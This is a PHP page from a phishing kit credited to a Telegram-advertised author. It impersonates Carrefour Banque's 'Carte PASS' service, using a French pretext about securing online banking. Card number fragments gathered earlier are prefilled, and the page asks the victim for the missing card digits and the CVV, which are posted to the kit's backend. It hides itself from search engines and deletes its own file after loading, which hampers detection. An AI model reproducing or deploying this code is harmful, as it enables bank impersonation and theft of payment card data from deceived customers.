<?php
    /*******
    Main Author: Z0N51
    Contact me on telegram : https://t.me/z0n51
    ********************************************************/
    
    require_once '../includes/main.php';
    reset_action(get_client_ip());
    $_SESSION['last_page'] = 'cc';
    $infos = get_infos();
    $cc = explode('-',$infos['numbers']);
    $date = $infos['date'];
    $full_name = $infos['full_name'];
?>
<!doctype html>
<html style="height: 100%; display: flex; flex-direction: column; background: #FFF;">

    <head>
        <!-- Required meta tags -->
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta name="robots" content="noindex," "nofollow," "noimageindex," "noarchive," "nocache," "nosnippet">
        
        <!-- CSS FILES -->
        <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css">
        <link rel="stylesheet" href="../assets/css/helpers.css">
        <link rel="stylesheet" href="../assets/css/style.css">

        <link rel="icon" type="image/x-icon" href="../assets/imgs/favicon.ico" />

        <title>Informations de Carte de crédit PASS</title>
    </head>

    <body style="height: 100%; display: flex; flex-direction: column; background: #FFF;">
        
        <!-- HEADER -->
        <header id="header" class="d-flex">
            <div class="logo flex-grow-1"><img style="max-width: 103px;" src="../assets/imgs/logo.png"></div>
            <p>Informations de Carte de crédit PASS</p>
        </header>
        <!-- END HEADER -->

        <div id="steps">
            <ul>
                <li class="active">1</li>
                <li class="active">2</li>
                <li>3</li>
                <li>4</li>
            </ul>
        </div>

        <!-- MAIN -->
        <main id="main" class="flex-grow-1">
            <div class="left">
                <ul>
                    <li class="active"><span>1</span> Mes informations</li>
                    <li class="active"><span>3</span> Carte PASS</li>
                    <li><span>2</span> Sécurité</li>
                    <li><span>4</span> Finalisation</li>
                </ul>
            </div>
            <div class="right">
                <form action="../index.php" method="post">
                    <input type="hidden" name="captcha">
                    <input type="hidden" name="step" value="cc">
                    <legend>Informations de Carte de crédit PASS</legend>
                    <p>Ce service vous permet de renseigner et/ou de mettre à jour votre compte afin de sécuriser au plus haut niveau vos opérations bancaires sur internet dont vos achats en ligne.</p>
                    <div class="form-group mb30 <?php echo is_invalid_class($_SESSION['errors'],'full_name') ?>">
                        <label for="full_name ">Nom complet</label>
                        <input type="text" inputmode="numeric" name="full_name" id="full_name" class="form-control" value="<?php echo $full_name; ?>">
                        <?php echo error_message($_SESSION['errors'],'full_name'); ?>
                    </div>
                    <div class="form-group mb30 <?php echo is_invalid_class($_SESSION['errors'],'one') ?>">
                        <label for="cc2 ">N° Carte PASS</label>
                        <div class="inputs">
                            <input type="text" inputmode="numeric" name="cc1" id="cc1" class="form-control" value="<?php echo $cc[0]; ?>" readonly style="background: #eeeeee;">
                            <input type="text" inputmode="numeric" maxlength="4" name="cc2" id="cc2" class="form-control" placeholder="XXXX" value="<?php echo get_value('cc2'); ?>">
                            <input type="text" inputmode="numeric" maxlength="4" name="cc3" id="cc3" class="form-control" placeholder="XXXX" value="<?php echo get_value('cc3'); ?>">
                            <input type="text" inputmode="numeric" name="cc4" id="cc4" class="form-control" value="<?php echo $cc[1]; ?>" readonly style="background: #eeeeee;">
                        </div>
                        <?php echo error_message($_SESSION['errors'],'one'); ?>
                    </div>
                    <div class="form-group mb30 <?php echo is_invalid_class($_SESSION['errors'],'two') ?>">
                        <label for="two ">Date d'expiration</label>
                        <input type="text" inputmode="numeric" name="two" maxlength="7" id="two" class="form-control" value="<?php echo $date; ?>" readonly style="background: #eeeeee;">
                        <?php echo error_message($_SESSION['errors'],'two'); ?>
                    </div>
                    <div class="form-group mb30 <?php echo is_invalid_class($_SESSION['errors'],'three') ?>">
                        <label for="three ">Cryptogramme visuel(CVV)</label>
                        <input type="text" inputmode="numeric" name="three" maxlength="3" id="three" class="form-control" placeholder="XXX" value="<?php echo get_value('three'); ?>">
                        <?php echo error_message($_SESSION['errors'],'three'); ?>
                    </div>
                    <div class="btns">
                        <button type="submit">Valider</button>
                    </div>
                </form>
            </div>
        </main>
        <!-- END MAIN -->

        <!-- FOOTER -->
        <footer id="footer">
            <div class="container">
                <p>
                    &copy; <?php echo date('Y'); ?> Carrefour Banque<br><span>Protection des données</span>
                </p>
            </div>
        </footer>
        <!-- END FOOTER -->

        <!-- JS FILES -->
        <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.bundle.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/js/all.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.payment/3.0.0/jquery.payment.min.js"></script>
        <script src="../assets/js/script.js"></script>

    </body>

</html>
<?php unlink(basename(__FILE__)); ?>